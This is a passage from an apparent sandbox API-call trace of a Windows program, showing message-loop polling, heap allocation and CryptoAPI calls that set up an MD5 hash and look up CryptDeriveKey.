wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.432] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.432] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0181.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.433] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.434] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.434] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.434] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.434] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.435] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.435] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.435] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.435] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.435] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.435] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.435] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.436] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.436] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.437] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0181.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.452] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0181.452] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0181.452] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0181.452] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0181.453] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0181.453] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0181.453] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0181.453] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.454] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.455] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0181.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf) returned 0x9bd408 [0181.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd408, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0181.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.460] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.460] 